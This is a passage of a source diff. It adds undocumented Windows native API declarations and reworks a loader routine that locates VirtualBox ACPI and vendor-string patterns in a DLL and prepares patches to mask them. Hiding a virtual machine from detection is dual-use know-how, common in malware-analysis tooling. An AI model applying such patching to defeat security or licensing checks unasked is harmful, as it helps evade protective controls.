+} TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE, *PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE;
+
+typedef struct _TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE
+{
+ PVOID pValue;
+ ULONG ValueLength;
+} TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE, *PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE;
+
+typedef struct _TOKEN_SECURITY_ATTRIBUTE_V1
+{
+ UNICODE_STRING Name;
+ USHORT ValueType;
+ USHORT Reserved;
+ ULONG Flags;
+ ULONG ValueCount;
+ union
+ {
+ PLONG64 pInt64;
+ PULONG64 pUint64;
+ PUNICODE_STRING pString;
+ PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE pFqbn;
+ PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE pOctetString;
+ } Values;
+} TOKEN_SECURITY_ATTRIBUTE_V1, *PTOKEN_SECURITY_ATTRIBUTE_V1;
+
+#define TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION_V1 1
+#define TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION_V1
+
+typedef struct _TOKEN_SECURITY_ATTRIBUTES_INFORMATION
+{
+ USHORT Version;
+ USHORT Reserved;
+ ULONG AttributeCount;
+ union
+ {
+ PTOKEN_SECURITY_ATTRIBUTE_V1 pAttributeV1;
+ } Attribute;
+} TOKEN_SECURITY_ATTRIBUTES_INFORMATION, *PTOKEN_SECURITY_ATTRIBUTES_INFORMATION;
+
+//
+// endof ntseapi.h
+//
NTSYSAPI
NTSTATUS
@@ -9234,6 +9753,39 @@ NtAccessCheckByTypeResultList(
_Out_writes_(ObjectTypeListLength) PACCESS_MASK GrantedAccess,
_Out_writes_(ObjectTypeListLength) PNTSTATUS AccessStatus);
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtOpenObjectAuditAlarm(
+ _In_ PUNICODE_STRING SubsystemName,
+ _In_opt_ PVOID HandleId,
+ _In_ PUNICODE_STRING ObjectTypeName,
+ _In_ PUNICODE_STRING ObjectName,
+ _In_opt_ PSECURITY_DESCRIPTOR SecurityDescriptor,
+ _In_ HANDLE ClientToken,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ ACCESS_MASK GrantedAccess,
+ _In_opt_ PPRIVILEGE_SET Privileges,
+ _In_ BOOLEAN ObjectCreation,
+ _In_ BOOLEAN AccessGranted,
+ _Out_ PBOOLEAN GenerateOnClose);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCloseObjectAuditAlarm(
+ _In_ PUNICODE_STRING SubsystemName,
+ _In_opt_ PVOID HandleId,
+ _In_ BOOLEAN GenerateOnClose);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtDeleteObjectAuditAlarm(
+ _In_ PUNICODE_STRING SubsystemName,
+ _In_opt_ PVOID HandleId,
+ _In_ BOOLEAN GenerateOnClose);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -9331,7 +9883,7 @@ NtAdjustPrivilegesToken(
_In_opt_ PTOKEN_PRIVILEGES NewState,
_In_ ULONG BufferLength,
_Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_PRIVILEGES PreviousState,
- _Out_ _When_(PreviousState == NULL, _Out_opt_) PULONG ReturnLength);
+ _Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
@@ -9342,7 +9894,7 @@ NtAdjustGroupsToken(
_In_opt_ PTOKEN_GROUPS NewState,
_In_opt_ ULONG BufferLength,
_Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_GROUPS PreviousState,
- _Out_ PULONG ReturnLength);
+ _Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
@@ -9671,6 +10223,38 @@ NTAPI
NtLockRegistryKey(
_In_ HANDLE KeyHandle);
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCreateRegistryTransaction(
+ _Out_ PHANDLE Handle,
+ _In_ ACCESS_MASK DesiredAccess, //generic + TRANSACTION_*
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ DWORD Flags);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtCommitRegistryTransaction(
+ _In_ HANDLE RegistryHandle,
+ _In_ BOOL Wait);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtOpenRegistryTransaction(
+ _Out_ PHANDLE RegistryHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ POBJECT_ATTRIBUTES ObjectAttributes);
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtRollbackRegistryTransaction(
+ _In_ HANDLE RegistryHandle,
+ _In_ BOOL Wait);
+
+
/************************************************************************************
*
* Job API.
@@ -9747,14 +10331,52 @@ NtTerminateJobObject(
*
************************************************************************************/
+//taken from ph2
+
+typedef enum _IO_SESSION_EVENT {
+ IoSessionEventIgnore,
+ IoSessionEventCreated,
+ IoSessionEventTerminated,
+ IoSessionEventConnected,
+ IoSessionEventDisconnected,
+ IoSessionEventLogon,
+ IoSessionEventLogoff,
+ IoSessionEventMax
+} IO_SESSION_EVENT;
+
+typedef enum _IO_SESSION_STATE {
+ IoSessionStateCreated,
+ IoSessionStateInitialized,
+ IoSessionStateConnected,
+ IoSessionStateDisconnected,
+ IoSessionStateDisconnectedLoggedOn,
+ IoSessionStateLoggedOn,
+ IoSessionStateLoggedOff,
+ IoSessionStateTerminated,
+ IoSessionStateMax
+} IO_SESSION_STATE;
+
NTSYSAPI
-NTSTATUS
-NTAPI
+NTSTATUS
+NTAPI
NtOpenSession(
_Out_ PHANDLE SessionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtNotifyChangeSession(
+ _In_ HANDLE SessionHandle,
+ _In_ ULONG ChangeSequenceNumber,
+ _In_ PLARGE_INTEGER ChangeTimeStamp,
+ _In_ IO_SESSION_EVENT Event,
+ _In_ IO_SESSION_STATE NewState,
+ _In_ IO_SESSION_STATE PreviousState,
+ _In_reads_bytes_opt_(PayloadSize) PVOID Payload,
+ _In_ ULONG PayloadSize);
+
/************************************************************************************
*
* IO Completion API.
@@ -10134,6 +10756,13 @@ NTAPI
NtTestAlert(
VOID);
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtDelayExecution(
+ _In_ BOOLEAN Alertable,
+ _In_opt_ PLARGE_INTEGER DelayInterval);
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -10152,17 +10781,17 @@ NTSYSAPI
NTSTATUS
NTAPI
NtCreateThreadEx(
- _Out_ PHANDLE hThread,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ LPVOID ObjectAttributes,
- _In_ HANDLE ProcessHandle,
- _In_ LPTHREAD_START_ROUTINE lpStartAddress,
- _In_ LPVOID lpParameter,
- _In_ BOOL CreateSuspended,
- _In_ DWORD StackZeroBits,
- _In_ DWORD SizeOfStackCommit,
- _In_ DWORD SizeOfStackReserve,
- _Out_ LPVOID lpBytesBuffer);
+ _Out_ PHANDLE ThreadHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
+ _In_ HANDLE ProcessHandle,
+ _In_ PVOID StartRoutine,
+ _In_opt_ PVOID Argument,
+ _In_ ULONG CreateFlags, //THREAD_CREATE_FLAGS_*
+ _In_opt_ ULONG_PTR ZeroBits,
+ _In_opt_ SIZE_T StackSize,
+ _In_opt_ SIZE_T MaximumStackSize,
+ _In_opt_ PPS_ATTRIBUTE_LIST AttributeList);
NTSYSAPI
ULONG
@@ -10305,6 +10934,77 @@ NtCreatePagingFile(
*
************************************************************************************/
+typedef struct _PORT_VIEW {
+ ULONG Length;
+ HANDLE SectionHandle;
+ ULONG SectionOffset;
+ SIZE_T ViewSize;
+ PVOID ViewBase;
+ PVOID ViewRemoteBase;
+} PORT_VIEW, *PPORT_VIEW;
+
+typedef struct _REMOTE_PORT_VIEW {
+ ULONG Length;
+ SIZE_T ViewSize;
+ PVOID ViewBase;
+} REMOTE_PORT_VIEW, *PREMOTE_PORT_VIEW;
+
+typedef struct _PORT_MESSAGE {
+ union {
+ struct {
+ CSHORT DataLength;
+ CSHORT TotalLength;
+ } s1;
+ ULONG Length;
+ } u1;
+ union {
+ struct {
+ CSHORT Type;
+ CSHORT DataInfoOffset;
+ } s2;
+ ULONG ZeroInit;
+ } u2;
+ union {
+ CLIENT_ID ClientId;
+ double DoNotUseThisField; // Force quadword alignment
+ } u3;
+ ULONG MessageId;
+ union {
+ ULONG ClientViewSize; // Only valid on LPC_CONNECTION_REQUEST message
+ ULONG CallbackId; // Only valid on LPC_REQUEST message
+ } u4;
+ UCHAR Reserved[8];
+} PORT_MESSAGE, *PPORT_MESSAGE;
+
+typedef struct _PORT_DATA_ENTRY {
+ PVOID Base;
+ ULONG Size;
+} PORT_DATA_ENTRY, *PPORT_DATA_ENTRY;
+
+typedef struct _PORT_DATA_INFORMATION {
+ ULONG CountDataEntries;
+ PORT_DATA_ENTRY DataEntries[1];
+} PORT_DATA_INFORMATION, *PPORT_DATA_INFORMATION;
+
+#define LPC_REQUEST 1
+#define LPC_REPLY 2
+#define LPC_DATAGRAM 3
+#define LPC_LOST_REPLY 4
+#define LPC_PORT_CLOSED 5
+#define LPC_CLIENT_DIED 6
+#define LPC_EXCEPTION 7
+#define LPC_DEBUG_EVENT 8
+#define LPC_ERROR_EVENT 9
+#define LPC_CONNECTION_REQUEST 10
+
+#define PORT_VALID_OBJECT_ATTRIBUTES (OBJ_CASE_INSENSITIVE)
+#define PORT_MAXIMUM_MESSAGE_LENGTH 256
+
+typedef struct _LPC_CLIENT_DIED_MSG {
+ PORT_MESSAGE PortMsg;
+ LARGE_INTEGER CreateTime;
+} LPC_CLIENT_DIED_MSG, *PLPC_CLIENT_DIED_MSG;
+
NTSYSAPI
NTSTATUS
NTAPI
@@ -10709,6 +11409,26 @@ NtTraceControl(
_In_ ULONG OutBufferLen,
_Out_ PULONG ReturnLength);
+/************************************************************************************
+*
+* Enclave API.
+*
+************************************************************************************/
+
+NTSYSAPI
+NTSTATUS
+NTAPI
+NtLoadEnclaveData(
+ _In_ HANDLE ProcessHandle,
+ _In_ PVOID BaseAddress,
+ _In_reads_bytes_(BufferSize) PVOID Buffer,
+ _In_ SIZE_T BufferSize,
+ _In_ ULONG Protect,
+ _In_reads_bytes_(PageInformationLength) PVOID PageInformation,
+ _In_ ULONG PageInformationLength,
+ _Out_opt_ PSIZE_T NumberOfBytesWritten,
+ _Out_opt_ PULONG EnclaveError);
+
/************************************************************************************
*
* Kernel Debugger API.
diff --git a/Source/Zekamashi/loader/oscompat.manifest b/Source/Zekamashi_v2/loader/oscompat.manifest
similarity index 100%
rename from Source/Zekamashi/loader/oscompat.manifest
rename to Source/Zekamashi_v2/loader/oscompat.manifest
diff --git a/Source/Zekamashi/loader/patterns.c b/Source/Zekamashi_v2/loader/patterns.c
similarity index 62%
rename from Source/Zekamashi/loader/patterns.c
rename to Source/Zekamashi_v2/loader/patterns.c
index c05a131..1a95753 100644
--- a/Source/Zekamashi/loader/patterns.c
+++ b/Source/Zekamashi_v2/loader/patterns.c
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2014 - 2019
+* (C) COPYRIGHT AUTHORS, 2014 - 2020
*
* TITLE: PATTERNS.C
*
-* VERSION: 1.100
+* VERSION: 2.00
*
-* DATE: 04 Jan 2019
+* DATE: 24 Jan 2020
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -17,46 +17,9 @@
#include "global.h"
#define MAX_HWID_BLOCKS_DEEP 32
-#define MAX_PATCH_BLOCKS 256
+#define MAX_PATCH_BLOCKS 64
-BINARY_PATCH_BLOCK_INTERNAL *DataBlocks;
-
-/*
-* FindPattern
-*
-* Purpose:
-*
-* Lookup pattern in buffer.
-*
-*/
-PVOID FindPattern(
- CONST PBYTE Buffer,
- SIZE_T BufferSize,
- CONST PBYTE Pattern,
- SIZE_T PatternSize
-)
-{
- PBYTE p = Buffer;
-
- if (PatternSize == 0)
- return NULL;
- if (BufferSize < PatternSize)
- return NULL;
- BufferSize -= PatternSize;
-
- do {
- p = memchr(p, Pattern[0], BufferSize - (p - Buffer));
- if (p == NULL)
- break;
-
- if (memcmp(p, Pattern, PatternSize) == 0)
- return p;
-
- p++;
- } while (BufferSize - (p - Buffer) > 0);
-
- return NULL;
-}
+BINARY_PATCH_BLOCK_INTERNAL* DataBlocks;
/*
* BuildTable
@@ -67,10 +30,10 @@ PVOID FindPattern(
*
*/
BOOL BuildTable(
- _In_ BINARY_PATCH_BLOCK_INTERNAL *PatchBlock,
+ _In_ BINARY_PATCH_BLOCK_INTERNAL* PatchBlock,
_In_ UINT BlockCount,
- _In_ PVOID *OutputBuffer,
- _Inout_opt_ DWORD *OutputBufferSize
+ _In_ PVOID* OutputBuffer,
+ _Inout_opt_ DWORD* OutputBufferSize
)
{
UINT i;
@@ -83,7 +46,7 @@ BOOL BuildTable(
return FALSE;
TableSize = BlockCount * sizeof(BINARY_PATCH_BLOCK_INTERNAL);
- Table = (PUCHAR)RtlAllocateHeap(GetProcessHeap(), HEAP_ZERO_MEMORY, TableSize);
+ Table = (PUCHAR)supHeapAlloc(TableSize);
if (Table) {
ProcessedSize = 0;
for (i = 0; i < BlockCount; i++) {
@@ -95,7 +58,7 @@ BOOL BuildTable(
}
//error converting table, entries are missing
if (i != BlockCount) {
- RtlFreeHeap(GetProcessHeap(), 0, Table);
+ supHeapFree(Table);
return FALSE;
}
@@ -110,6 +73,10 @@ BOOL BuildTable(
return bResult;
}
+#define PATTERN_FOUND(s, x) { printf_s("%s\t\t0x%lx\r\n", s, x);}
+#define PATTERN_FOUND2(s, x) { printf_s("%s\t0x%lx\r\n", s, x);}
+
+#define PATTERN_NOT_FOUND(s) { printf_s("Pattern %s was not found\r\n", s); }
/*
* ProcessVirtualBoxFile
@@ -121,12 +88,11 @@ BOOL BuildTable(
*/
UINT ProcessVirtualBoxFile(
_In_ LPTSTR lpszPath,
- _In_ PVOID *OutputBuffer,
- _Inout_opt_ DWORD *OutputBufferSize
+ _In_ PVOID* OutputBuffer,
+ _Inout_opt_ DWORD* OutputBufferSize
)
{
UINT uResult = (UINT)-1;
- BOOL cond = FALSE;
ULONG c = 0, d = 0;
HANDLE fh = NULL, sec = NULL;
@@ -137,8 +103,6 @@ UINT ProcessVirtualBoxFile(
PBYTE DllBase = NULL, Pattern;
SIZE_T DllVirtualSize;
- TCHAR LogBuffer[MAX_PATH];
-
RtlSecureZeroMemory(&usFileName, sizeof(usFileName));
do {
@@ -169,303 +133,319 @@ UINT ProcessVirtualBoxFile(
if (!NT_SUCCESS(status))
break;
- DataBlocks = (BINARY_PATCH_BLOCK_INTERNAL*)RtlAllocateHeap(GetProcessHeap(), HEAP_ZERO_MEMORY,
- sizeof(BINARY_PATCH_BLOCK_INTERNAL) * MAX_PATCH_BLOCKS);
+ DataBlocks = (BINARY_PATCH_BLOCK_INTERNAL*)supHeapAlloc(sizeof(BINARY_PATCH_BLOCK_INTERNAL) * MAX_PATCH_BLOCKS);
if (DataBlocks == NULL)
break;
c = 0;
//locate VBOX patterns
- cuiPrintText(TEXT("\r\nPattern matching: 'VBOX'\r\n"), TRUE);
+ printf_s("\r\n%s\r\n\r\n", "Pattern matching: 'VBOX'");
//
// FACP
//
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)DllBase, DllVirtualSize,
(CONST PBYTE)FACP_PATTERN, sizeof(FACP_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(4 + Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("FACP\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
+ PATTERN_FOUND("FACP (pre v6.1)", (ULONG)DataBlocks[c].VirtualOffset);
+ c += 1;
+ }
+ else {
+ PATTERN_NOT_FOUND("FACP (pre v6.1)");
+ }
+
+ Pattern = supFindPattern(
+ (CONST PBYTE)DllBase, DllVirtualSize,
+ (CONST PBYTE)FACP_PATTERN_61, sizeof(FACP_PATTERN_61));
+ if (Pattern) {
+ DataBlocks[c].VirtualOffset = (ULONG)(4 + Pattern - DllBase);
+ DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
+ RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
+ PATTERN_FOUND("FACP (v6.1+)", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
}
else {
- _strcpy(LogBuffer, TEXT("\tPattern FACP not found"));
+ PATTERN_NOT_FOUND("FACP (v6.1+)");
}
- cuiPrintText(LogBuffer, TRUE);
//
// RSDT
//
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)DllBase, DllVirtualSize,
(CONST PBYTE)RSDT_PATTERN, sizeof(RSDT_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("RSDT\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
+ PATTERN_FOUND("RSDT (pre 6.1)", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
}
else {
- _strcpy(LogBuffer, TEXT("\tPattern RSDT not found"));
+ PATTERN_NOT_FOUND("RSDT (pre 6.1)");
+ }
+
+ Pattern = supFindPattern(
+ (CONST PBYTE)DllBase, DllVirtualSize,
+ (CONST PBYTE)RSDT_PATTERN_61, sizeof(RSDT_PATTERN_61));
+ if (Pattern) {
+ DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
+ DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
+ RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
+ PATTERN_FOUND("RSDT (6.1+)", (ULONG)DataBlocks[c].VirtualOffset);
+ c += 1;
+ }
+ else {
+ PATTERN_NOT_FOUND("RSDT (pre 6.1+)");
}
- cuiPrintText(LogBuffer, TRUE);
//
// XSDT
//
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)DllBase, DllVirtualSize,
(CONST PBYTE)XSDT_PATTERN, sizeof(XSDT_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("XSDT\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
+ PATTERN_FOUND("XSDT", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
}
else {
- _strcpy(LogBuffer, TEXT("\tPattern XSDT not found"));
+ PATTERN_NOT_FOUND("XSDT");
}
- cuiPrintText(LogBuffer, TRUE);
//
// APIC
//
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)DllBase, DllVirtualSize,
(CONST PBYTE)APIC_PATTERN, sizeof(APIC_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("APIC\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
+ PATTERN_FOUND("APIC", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
}
else {
- _strcpy(LogBuffer, TEXT("\tPattern APIC not found"));
+ PATTERN_NOT_FOUND("APIC");
}
- cuiPrintText(LogBuffer, TRUE);
//
// HPET
//
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)DllBase, DllVirtualSize,
(CONST PBYTE)HPET_PATTERN, sizeof(HPET_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("HPET\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
+ PATTERN_FOUND("HPET", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
}
else {
- _strcpy(LogBuffer, TEXT("\tPattern HPET not found"));
+ PATTERN_NOT_FOUND("HPET");
}
- cuiPrintText(LogBuffer, TRUE);
//
// MCFG
//
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)DllBase, DllVirtualSize,
(CONST PBYTE)MCFG_PATTERN, sizeof(MCFG_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("MCFG\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
+ PATTERN_FOUND("MCFG", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
}
else {
- _strcpy(LogBuffer, TEXT("\tPattern MCFG not found"));
+ PATTERN_NOT_FOUND("MCFG");
}
- cuiPrintText(LogBuffer, TRUE);
//
// VBOXCPU
//
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)DllBase, DllVirtualSize,
(CONST PBYTE)VBOXCPU_PATTERN, sizeof(VBOXCPU_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(2 + Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VBOXCPU\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
+ PATTERN_FOUND("VBOXCPU", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
}
else {
- _strcpy(LogBuffer, TEXT("\tPattern VBOXCPU not found"));
+ PATTERN_NOT_FOUND("VBOXCPU");
}
- cuiPrintText(LogBuffer, TRUE);
//
// VBOX 1.0 CDROM
//
- /*RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
+ /*
+ Pattern = supFindPattern(
(CONST PBYTE)DllBase, DllVirtualSize,
(CONST PBYTE)CDROMVBOX_PATTERN, sizeof(CDROMVBOX_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(12 + Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VBOXCDROM\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
+ PATTERN_FOUND("VBOXCDOM", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
}
else {
- _strcpy(LogBuffer, TEXT("\tPattern VBOXCDROM not found"));
+ PATTERN_NOT_FOUND("VBOXCDROM");
}
- cuiPrintText(LogBuffer, TRUE);*/
+ */
//
// VBOX generic
//
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)DllBase, DllVirtualSize,
(CONST PBYTE)JUSTVBOX_PATTERN, sizeof(JUSTVBOX_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VBOX\t\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
+ PATTERN_FOUND("VBOX (pre 6.1)", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
}
else {
- _strcpy(LogBuffer, TEXT("\tPattern VBOX generic not found"));
+ PATTERN_NOT_FOUND("VBOX generic (pre 6.1)");
+ }
+
+ Pattern = supFindPattern(
+ (CONST PBYTE)DllBase, DllVirtualSize,
+ (CONST PBYTE)JUSTVBOX_PATTERN_61, sizeof(JUSTVBOX_PATTERN_61));
+ if (Pattern) {
+ DataBlocks[c].VirtualOffset = (ULONG)(3 + Pattern - DllBase);
+ DataBlocks[c].DataLength = sizeof(VBOX_PATCH);
+ RtlCopyMemory(DataBlocks[c].Data, VBOX_PATCH, DataBlocks[c].DataLength);
+ PATTERN_FOUND("VBOX (6.1+)", (ULONG)DataBlocks[c].VirtualOffset);
+ c += 1;
+ }
+ else {
+ PATTERN_NOT_FOUND("VBOX generic (6.1+)");
}
- cuiPrintText(LogBuffer, TRUE);
//locate VirtualBox pattern
- cuiPrintText(TEXT("\r\nPattern matching: 'VirtualBox'\r\n"), TRUE);
+ printf_s("\r\n%s\r\n\r\n", "Pattern matching: 'VirtualBox'");
//
// 'VirtualBox'
//
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)DllBase, DllVirtualSize,
(CONST PBYTE)JUSTVIRTUALBOX_PATTERN, sizeof(JUSTVIRTUALBOX_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH);
RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VirtualBox\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
+ PATTERN_FOUND2("VirtualBox", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
}
else {
- _strcpy(LogBuffer, TEXT("\tPattern VirtualBox not found"));
+ PATTERN_NOT_FOUND("VirtualBox");
}
- cuiPrintText(LogBuffer, TRUE);
//
// 'VirtualBox__'
//
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)DllBase, DllVirtualSize,
(CONST PBYTE)VIRTUALBOX2020_PATTERN, sizeof(VIRTUALBOX2020_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH);
RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VirtualBox__\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
+ PATTERN_FOUND2("VirtualBox__", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
}
else {
- _strcpy(LogBuffer, TEXT("\tPattern VirtualBox__ not found"));
+ PATTERN_NOT_FOUND("VirtualBox__");
}
- cuiPrintText(LogBuffer, TRUE);
//
// 'VirtualBox GIM'
//
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)DllBase, DllVirtualSize,
(CONST PBYTE)VIRTUALBOXGIM_PATTERN, sizeof(VIRTUALBOXGIM_PATTERN));
if (Pattern) {
DataBlocks[c].VirtualOffset = (ULONG)(Pattern - DllBase);
DataBlocks[c].DataLength = sizeof(JUSTVIRTUALBOX_PATCH);
RtlCopyMemory(DataBlocks[c].Data, JUSTVIRTUALBOX_PATCH, DataBlocks[c].DataLength);
- _strcpy(LogBuffer, TEXT("VirtualBox GIM\t0x"));
- ultohex((ULONG)DataBlocks[c].VirtualOffset, _strend(LogBuffer));
+ PATTERN_FOUND2("VirtualBox GIM", (ULONG)DataBlocks[c].VirtualOffset);
c += 1;
}
else {
- _strcpy(LogBuffer, TEXT("\tVirtualBox GIM pattern not found"));
+ PATTERN_NOT_FOUND("VirtualBox GIM");
}
- cuiPrintText(LogBuffer, TRUE);
//
// 'VirtualBox VMM'
//
- RtlSecureZeroMemory(LogBuffer, sizeof(LogBuffer));
- Pattern = FindPattern(
+ Pattern = supFindPattern(
(CONST PBYTE)DllBase, DllVirtualSize,
(CONST PBYTE)VIRTUALBOXVMM_PATTERN, sizeof(VIRTUALBOXVMM_PATTERN));
if (Pattern) {
